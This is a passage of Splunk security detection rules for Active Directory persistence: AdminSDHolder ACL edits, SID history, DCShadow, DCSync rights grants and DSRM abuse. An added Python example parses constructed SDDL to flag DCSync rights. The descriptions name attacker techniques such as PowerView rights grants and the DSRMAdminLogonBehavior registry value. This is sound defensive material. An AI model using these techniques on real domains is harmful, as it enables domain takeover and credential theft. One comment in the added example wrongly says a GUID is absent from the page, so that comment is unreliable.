action.risk.param._risk = [{"risk_object_field": "SubjectUserName", "risk_object_type": "other", "risk_score": 56}, {"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 56}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows AD AdminSDHolder ACL Modified - Rule
action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the modification of the Access Control List for the AdminSDHolder object within a Windows domain. Specifically, the detection triggers on the addition of a new rule to the existing ACL. AdminSDHolder is an object located in the System Partition in Active Directory and is used as a security template for objects that are members of certain privileged groups. Objects in these groups are enumerated and any objects with security descriptors that don't match the AdminSDHolder ACL are flagged for updating. The Security Descriptor propagator (SDProp) process runs every 60 minutes on the PDC Emulator and re-stamps the object Access Control List (ACL) with the security permissions set on the AdminSDHolder. An adversary who has obtained privileged access to a Windows Domain may modify the AdminSDHolder ACL to establish persistence and allow an unprivileged user to take control of a domain.
action.notable.param.rule_title = Windows AD AdminSDHolder ACL Modified
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=5136 AttributeLDAPDisplayName=nTSecurityDescriptor OperationType="%%14674" ObjectDN="CN=AdminSDHolder,CN=System*" | rex field=AttributeValue max_match=10000 "A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;(?P<added_user_sid>S-1-[0-59]-\d{2}-\d{8,10}-\d{8,10}-\d{8,10}-[1-9]\d{3})\)" | stats values(added_user_sid) by _time, Computer, SubjectUserName, ObjectDN | `windows_ad_adminsdholder_acl_modified_filter`

[ESCU - Windows AD Cross Domain SID History Addition - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic looks for changes to the sIDHistory AD attribute of user or computer objects within different domains. The SID history AD attribute allows users to inherit permissions from a separate AD account without group changes. Initially developed for access continuity when migrating user accounts to different domains, this attribute can also be abused by adversaries for inter-domain privilege escalation and persistence.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.005", "T1134"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic looks for changes to the sIDHistory AD attribute of user or computer objects within different domains. The SID history AD attribute allows users to inherit permissions from a separate AD account without group changes. Initially developed for access continuity when migrating user accounts to different domains, this attribute can also be abused by adversaries for inter-domain privilege escalation and persistence.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting eventcodes `4738` and `4742`. The Advanced Security Audit policy settings `Audit User Account Management` and `Audit Computer Account Management` within `Account Management` all need to be enabled.
action.escu.known_false_positives = Domain mergers and migrations may generate large volumes of false positives for this analytic.
action.escu.creation_date = 2022-11-17
action.escu.modification_date = 2022-11-17
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows AD Cross Domain SID History Addition - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"]
action.risk = 1
action.risk.param._risk_message = Active Directory SID History Attribute was added to $user$ by $src_user$
action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows AD Cross Domain SID History Addition - Rule
action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 80, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.005", "T1134"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic looks for changes to the sIDHistory AD attribute of user or computer objects within different domains. The SID history AD attribute allows users to inherit permissions from a separate AD account without group changes. Initially developed for access continuity when migrating user accounts to different domains, this attribute can also be abused by adversaries for inter-domain privilege escalation and persistence.
action.notable.param.rule_title = Windows AD Cross Domain SID History Addition
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` (EventCode=4742 OR EventCode=4738) NOT SidHistory IN ("%%1793", -) | rex field=SidHistory "(^%{|^)(?P<SidHistoryMatch>.*)(\-|\\\)" | rex field=TargetSid "^(?P<TargetSidmatch>.*)(\-|\\\)" | where SidHistoryMatch!=TargetSidmatch AND SidHistoryMatch!=TargetDomainName | rename TargetSid as userSid | table _time action status host user userSid SidHistory Logon_ID src_user | `windows_ad_cross_domain_sid_history_addition_filter`

[ESCU - Windows AD Domain Controller Audit Policy Disabled - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects the disabling of audit policies on a domain controller. The detection is made by identifying changes made to audit policies and checks for the removal of success or failure auditing, which are common indicators of policy tampering. The detection is important because it indicates that an attacker has gained access to the domain controller and is attempting to evade detection and cover up malicious activity. The impact of such an attack can be severe, including data theft, privilege escalation, and compromise of the entire network. False positives might occur since legitimate changes to audit policies might also trigger the analytic. Upon triage, review the audit policy change event and investigate the source of the change. Additionally, you must capture and inspect any relevant on-disk artifacts and review concurrent processes to identify the attack source.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001"], "nist": ["DE.CM"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = The following analytic detects the disabling of audit policies on a domain controller. The detection is made by identifying changes made to audit policies and checks for the removal of success or failure auditing, which are common indicators of policy tampering. The detection is important because it indicates that an attacker has gained access to the domain controller and is attempting to evade detection and cover up malicious activity. The impact of such an attack can be severe, including data theft, privilege escalation, and compromise of the entire network. False positives might occur since legitimate changes to audit policies might also trigger the analytic. Upon triage, review the audit policy change event and investigate the source of the change. Additionally, you must capture and inspect any relevant on-disk artifacts and review concurrent processes to identify the attack source.
action.escu.how_to_implement = Ensure you are ingesting EventCode `4719` from your domain controllers, that the category domain_controller exists in assets and identities, and that assets and identities is enabled. If A&I is not configured, you will need to manually filter the results within the base search.
action.escu.known_false_positives = Unknown
action.escu.creation_date = 2023-01-26
action.escu.modification_date = 2023-01-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows AD Domain Controller Audit Policy Disabled - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"]
action.risk = 1
action.risk.param._risk_message = GPO $SubCategory$ of $Category$ was disabled on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 60}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows AD Domain Controller Audit Policy Disabled - Rule
action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 60, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects the disabling of audit policies on a domain controller. It identifies audit policy change events (EventCode 4719) and checks for the removal of success or failure auditing from a subcategory, which is a common indicator of policy tampering. The detection is important because it indicates that an attacker has gained access to the domain controller and is attempting to evade detection and cover up malicious activity. The impact of such an attack can be severe, including data theft, privilege escalation, and compromise of the entire network. False positives might occur since legitimate changes to audit policies also trigger the analytic. Upon triage, review the audit policy change event and investigate the source of the change. Additionally, capture and inspect any relevant on-disk artifacts and review concurrent processes to identify the attack source.
action.notable.param.rule_title = Windows AD Domain Controller Audit Policy Disabled
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4719 (AuditPolicyChanges IN ("%%8448","%%8450","%%8448, %%8450") OR Changes IN ("Failure removed","Success removed","Success removed, Failure removed")) dest_category="domain_controller"| replace "%%8448" with "Success removed", "%%8450" with "Failure removed", "%%8448, %%8450" with "Success removed, Failure removed" in AuditPolicyChanges | eval AuditPolicyChanges=coalesce(AuditPolicyChanges,Changes), SubcategoryGuid=coalesce(SubcategoryGuid,Subcategory_GUID) | stats min(_time) as _time values(host) as dest by AuditPolicyChanges SubcategoryGuid | lookup advanced_audit_policy_guids GUID as SubcategoryGuid OUTPUT Category SubCategory | `windows_ad_domain_controller_audit_policy_disabled_filter`

[ESCU - Windows AD Domain Controller Promotion - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic identifies a genuine DC promotion event: a computer assigning itself the Service Principal Names (SPNs) necessary to function as a domain controller. Note that these events are logged on the existing domain controllers, not on the newly promoted one. This detection will serve to identify rogue DCs added to the network. Two other detections within this analytic story identify DCShadow attacks; if you do not currently have the logging those detections require, remove the `where src_user=user` clause from this detection (a genuine promotion is performed by the computer account itself, whereas DCShadow registers the SPNs on behalf of another account) so that it also surfaces DCShadow activity.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1207"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This analytic identifies a genuine DC promotion event: a computer assigning itself the Service Principal Names (SPNs) necessary to function as a domain controller. Note that these events are logged on the existing domain controllers, not on the newly promoted one. This detection will serve to identify rogue DCs added to the network. Two other detections within this analytic story identify DCShadow attacks; if you do not currently have the logging those detections require, remove the `where src_user=user` clause from this detection so that it also surfaces DCShadow activity.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting EventCode `4742`. The Advanced Security Audit Policy setting `Audit Computer Account Management` within `Account Management` needs to be enabled.
action.escu.known_false_positives = None.
action.escu.creation_date = 2023-01-26
action.escu.modification_date = 2023-01-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows AD Domain Controller Promotion - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"]
action.risk = 1
action.risk.param._risk_message = AD Domain Controller Promotion Event Detected for $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "other", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows AD Domain Controller Promotion - Rule
action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1207"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic identifies a genuine DC promotion event: a computer assigning itself the Service Principal Names (SPNs) necessary to function as a domain controller. Note that these events are logged on the existing domain controllers, not on the newly promoted one. This detection will serve to identify rogue DCs added to the network. Two other detections within this analytic story identify DCShadow attacks; if you do not currently have the logging those detections require, remove the `where src_user=user` clause from this detection so that it also surfaces DCShadow activity.
action.notable.param.rule_title = Windows AD Domain Controller Promotion
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` EventCode=4742 ServicePrincipalNames IN ("*E3514235-4B06-11D1-AB04-00C04FC2DCD2/*","*GC/*")| stats min(_time) as _time latest(ServicePrincipalNames) as ServicePrincipalNames,values(signature) as signature, values(src_user) as src_user, values(user) as user by Logon_ID, dvc| where src_user=user| rename Logon_ID as TargetLogonId, user as dest | appendpipe [| map search="search `wineventlog_security` EventCode=4624 TargetLogonId=$TargetLogonId$" | fields - dest, dvc, signature]| stats min(_time) as _time, values(TargetUserSid) as TargetUserSid, values(Target_Domain) as Target_Domain, values(user) as user, values(status) as status, values(src_category) as src_category, values(src_ip) as src_ip values(ServicePrincipalNames) as ServicePrincipalNames values(signature) as signature values(dest) as dest values(dvc) as dvc by TargetLogonId | eval dest=trim(dest,"$") | `windows_ad_domain_controller_promotion_filter`

[ESCU - Windows AD Domain Replication ACL Addition - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects the addition of the permissions necessary to perform a DCSync attack. In order to replicate AD objects, the initiating user or computer must hold the following extended rights on the domain object: DS-Replication-Get-Changes and DS-Replication-Get-Changes-All. Certain sync operations additionally require DS-Replication-Get-Changes-In-Filtered-Set. By default, adding DCSync permissions via the PowerView `Add-ObjectACL` operation grants all three. This alert fires when all three rights have been granted to the same principal (`fullSet`) and also when only the two base rights have been granted (`minDCSyncPermissions`).
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484"], "nist": ["DE.CM"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = The following analytic detects the addition of the permissions necessary to perform a DCSync attack. In order to replicate AD objects, the initiating user or computer must hold the following extended rights on the domain object: DS-Replication-Get-Changes and DS-Replication-Get-Changes-All. Certain sync operations additionally require DS-Replication-Get-Changes-In-Filtered-Set. By default, adding DCSync permissions via the PowerView `Add-ObjectACL` operation grants all three. This alert fires when all three rights have been granted to the same principal (`fullSet`) and also when only the two base rights have been granted (`minDCSyncPermissions`).
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting EventCode `5136`. The Advanced Security Audit Policy setting `Audit Directory Service Changes` within `DS Access` needs to be enabled, alongside a SACL for `Everyone` auditing `Write All Properties`, applied to the domain root and all descendant objects. Once the necessary logging has been enabled, enumerate the domain object's security descriptor to verify whether existing accounts that already hold these rights need to be whitelisted or revoked. Assets and Identities is also leveraged to translate the objectSid into a username: ensure your identities lookup is configured with the sAMAccountName and objectSid of all AD user and computer objects.
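# Added example, not part of the Splunk content or of the search in this stanza: how the
# search extracts trustees from the SDDL that a 5136 event carries in AttributeValue when
# nTSecurityDescriptor changes, and how minDCSyncPermissions and fullSet follow from the
# rights each trustee holds. The SDDL fragment and every SID in it are constructed; the
# 1131f6aa GUID (DS-Replication-Get-Changes) does not appear on this page and is the
# well-known schema GUID of that right. The example also shows two consequences of the
# search's SID pattern: built-in holders such as Domain Controllers (RID 516) are skipped,
# and so is any account whose RID has five digits.

```python
import re
from collections import defaultdict

# Extended-right GUIDs found in the object_guid slot of an object ACE (type OA, rights CR).
# 1131f6ad and 89e95b76 appear on this page; 1131f6aa is the well-known schema GUID of
# the base right, DS-Replication-Get-Changes.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
BASE_RIGHTS = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"}
FILTERED_RIGHT = "DS-Replication-Get-Changes-In-Filtered-Set"

# The search's SID pattern, verbatim: a domain SID whose RID has exactly four digits.
# It therefore skips well-known RIDs such as 516 (Domain Controllers), the two-letter
# SDDL aliases (ED, DA, BA ...) and any account with a RID of 10000 or more.
SID_PATTERN = re.compile(r"S-1-[0-59]-\d{2}-\d{8,10}-\d{8,10}-\d{8,10}-[1-9]\d{3}")

# SDDL ACE layout: (type;flags;rights;object_guid;inherit_object_guid;trustee)
ACE_PATTERN = re.compile(
    r"\((?P<type>[A-Z]+);(?P<flags>[A-Z]*);(?P<rights>[A-Z]*);"
    r"(?P<obj>[0-9a-fA-F-]*);(?P<inherit>[0-9a-fA-F-]*);(?P<sid>[^)]+)\)")


def replication_grants(sddl: str) -> dict:
    """Map each trustee SID matching the search's pattern to the replication rights it is
    granted in an nTSecurityDescriptor SDDL (the AttributeValue of a 5136 event)."""
    grants = defaultdict(set)
    for ace in ACE_PATTERN.finditer(sddl):
        if ace["type"] != "OA" or ace["rights"] != "CR":
            continue
        right = REPL_RIGHTS.get(ace["obj"].lower())
        if right is None or not SID_PATTERN.fullmatch(ace["sid"]):
            continue
        grants[ace["sid"]].add(right)
    return dict(grants)


def evaluate(grants: dict) -> list:
    """The search's eval/where: keep SIDs holding both base rights (minDCSyncPermissions)
    and mark whether the filtered-set right completes the trifecta (fullSet)."""
    results = []
    for sid, rights in sorted(grants.items()):
        if not BASE_RIGHTS <= rights:
            continue
        results.append({"userSid": sid, "minDCSyncPermissions": True,
                        "fullSet": FILTERED_RIGHT in rights})
    return results


# Constructed SDDL fragment (not from a real domain); the subauthorities are placeholders.
DOM_SID = "S-1-5-21-1111111111-2222222222-3333333333"
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    # legitimate holders: the Enterprise Domain Controllers alias and Domain Controllers (RID 516)
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    f"(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{DOM_SID}-516)"
    # RID 1104: base right only, cannot DCSync -> dropped by evaluate()
    f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{DOM_SID}-1104)"
    # RID 1105: all three rights -> fullSet
    f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{DOM_SID}-1105)"
    f"(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{DOM_SID}-1105)"
    f"(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;{DOM_SID}-1105)"
    # RID 1106: the two base rights only -> minDCSyncPermissions, not fullSet
    f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{DOM_SID}-1106)"
    f"(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{DOM_SID}-1106)"
    # RID 12345: holds both base rights, but the four-digit RID pattern never matches it
    f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{DOM_SID}-12345)"
    f"(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{DOM_SID}-12345)"
    "(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
)


def run_sample():
    return evaluate(replication_grants(SAMPLE_SDDL))


if __name__ == "__main__":
    for row in run_sample():
        print(row)
```

# The RID 12345 case is worth checking in your own domain before relying on this search:
# RIDs are allocated sequentially, so a domain that has created more than ten thousand
# principals has accounts the pattern cannot match. Widening `[1-9]\d{3}` to `[1-9]\d{3,}`
# in the three rex commands closes that gap without admitting the built-in RIDs.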
action.escu.known_false_positives = When there is a change to nTSecurityDescriptor, Windows logs the entire ACL including the newly added components. If existing accounts are present with this permission, they will raise an alert each time the nTSecurityDescriptor is updated unless whitelisted.
action.escu.creation_date = 2022-11-18
action.escu.modification_date = 2022-11-18
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows AD Domain Replication ACL Addition - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"]
action.risk = 1
action.risk.param._risk_message = $src_user$ has granted $user$ permission to replicate AD objects
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "src_user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Windows AD Domain Replication ACL Addition - Rule
action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 80, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1484"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects the addition of the permissions necessary to perform a DCSync attack. In order to replicate AD objects, the initiating user or computer must hold the following extended rights on the domain object: DS-Replication-Get-Changes and DS-Replication-Get-Changes-All. Certain sync operations additionally require DS-Replication-Get-Changes-In-Filtered-Set. By default, adding DCSync permissions via the PowerView `Add-ObjectACL` operation grants all three. This alert fires when all three rights have been granted to the same principal (`fullSet`) and also when only the two base rights have been granted (`minDCSyncPermissions`).
action.notable.param.rule_title = Windows AD Domain Replication ACL Addition
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `wineventlog_security` | rex field=AttributeValue max_match=10000 \"OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;(?P<DSRGetChanges_user_sid>S-1-[0-59]-\d{2}-\d{8,10}-\d{8,10}-\d{8,10}-[1-9]\d{3})\)\"| rex field=AttributeValue max_match=10000 \"OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;(?P<DSRGetChangesAll_user_sid>S-1-[0-59]-\d{2}-\d{8,10}-\d{8,10}-\d{8,10}-[1-9]\d{3})\)\"| rex field=AttributeValue max_match=10000 \"OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;(?P<DSRGetChangesFiltered_user_sid>S-1-[0-59]-\d{2}-\d{8,10}-\d{8,10}-\d{8,10}-[1-9]\d{3})\)\"| table _time dest src_user DSRGetChanges_user_sid DSRGetChangesAll_user_sid DSRGetChangesFiltered_user_sid| mvexpand DSRGetChanges_user_sid| eval minDCSyncPermissions=if(DSRGetChanges_user_sid=DSRGetChangesAll_user_sid,\"true\",\"false\"), fullSet=if(DSRGetChanges_user_sid=DSRGetChangesAll_user_sid AND DSRGetChanges_user_sid=DSRGetChangesFiltered_user_sid,\"true\",\"false\")| where minDCSyncPermissions=\"true\" | lookup identity_lookup_expanded objectSid as DSRGetChanges_user_sid OUTPUT sAMAccountName as user | rename DSRGetChanges_user_sid as userSid | stats min(_time) as _time values(user) as user by dest src_user userSid minDCSyncPermissions fullSet| `windows_ad_domain_replication_acl_addition_filter`

[ESCU - Windows AD DSRM Account Changes - Rule]
action.escu = 0
action.escu.enabled = 1
description = Aside from being used to promote genuine domain controllers, the DSRM (Directory Services Restore Mode) account can be used to persist within a domain. A DC can be configured, via the `DSRMAdminLogonBehavior` value under `HKLM\System\CurrentControlSet\Control\Lsa`, to allow the DSRM account to log on and be used in the same way as a local administrator account: a value of 1 permits the logon while the directory service is stopped, a value of 2 permits it at any time. This detection looks for that registry value being set to 1 or 2.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = Aside from being used to promote genuine domain controllers, the DSRM (Directory Services Restore Mode) account can be used to persist within a domain. A DC can be configured, via the `DSRMAdminLogonBehavior` value under `HKLM\System\CurrentControlSet\Control\Lsa`, to allow the DSRM account to log on and be used in the same way as a local administrator account: a value of 1 permits the logon while the directory service is stopped, a value of 2 permits it at any time. This detection looks for that registry value being set to 1 or 2.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process, as well as registry modification events that carry the same process GUID. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Registry` and `Processes` nodes of the `Endpoint` data model: the search reads the registry modification from `Endpoint.Registry` and joins it to the modifying process in `Endpoint.Processes` on `process_guid`. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Disaster recovery events.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows AD DSRM Account Changes - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks", "Windows Registry Abuse", "Windows Persistence Techniques"]
action.risk = 1
action.risk.param._risk_message = DSRM Account Changes Initiated on $dest$ by $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 100}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 100}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Windows AD DSRM Account Changes - Rule
action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks", "Windows Registry Abuse", "Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = Aside from being used to promote genuine domain controllers, the DSRM (Directory Services Restore Mode) account can be used to persist within a domain. A DC can be configured, via the `DSRMAdminLogonBehavior` value under `HKLM\System\CurrentControlSet\Control\Lsa`, to allow the DSRM account to log on and be used in the same way as a local administrator account: a value of 1 permits the logon while the directory service is stopped, a value of 2 permits it at any time. This detection looks for that registry value being set to 1 or 2.
action.notable.param.rule_title = Windows AD DSRM Account Changes
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` min(_time) as _time from datamodel=Endpoint.Registry where Registry.registry_path= "*\\System\\CurrentControlSet\\Control\\Lsa\\DSRMAdminLogonBehavior" Registry.registry_value_data IN ("*1","*2") by Registry.action Registry.registry_path Registry.registry_value_data Registry.registry_value_type Registry.process_guid Registry.dest Registry.user | `drop_dm_object_name(Registry)` | join type=outer process_guid [| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes by Processes.user Processes.process_name Processes.process Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid | `drop_dm_object_name(Processes)`] | table _time action dest user parent_process_name parent_process process_name process process_guid registry_path registry_value_data registry_value_type | `windows_ad_dsrm_account_changes_filter`

[ESCU - Windows AD DSRM Password Reset - Rule]
action.escu = 0
action.escu.enabled = 1
description = Aside from being used to promote genuine domain controllers, the DSRM (Directory Services Restore Mode) account can be used to persist within a domain. A DC can be configured to allow the DSRM account to log on and be used in the same way as a local administrator account. This detection looks for any password reset attempts against that account (EventCode 4794).
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = Aside from being used to promote genuine domain controllers, the DSRM (Directory Services Restore Mode) account can be used to persist within a domain. A DC can be configured to allow the DSRM account to log on and be used in the same way as a local administrator account. This detection looks for any password reset attempts against that account (EventCode 4794).
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting EventCode `4794` and have the Advanced Security Audit Policy setting `Audit User Account Management` within `Account Management` enabled.
action.escu.known_false_positives = Resetting the DSRM password for legitimate reasons, e.g. a forgotten password or disaster recovery; deliberately deploying an AD backdoor during an authorised exercise.
action.escu.creation_date = 2022-09-08
action.escu.modification_date = 2022-09-08
action.escu.confidence = high
action.escu.full_search_name = ESCU - Windows AD DSRM Password Reset - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"]
action.risk = 1
action.risk.param._risk_message = DSRM Account Password was reset on $dest$ by $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 100}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 100}]
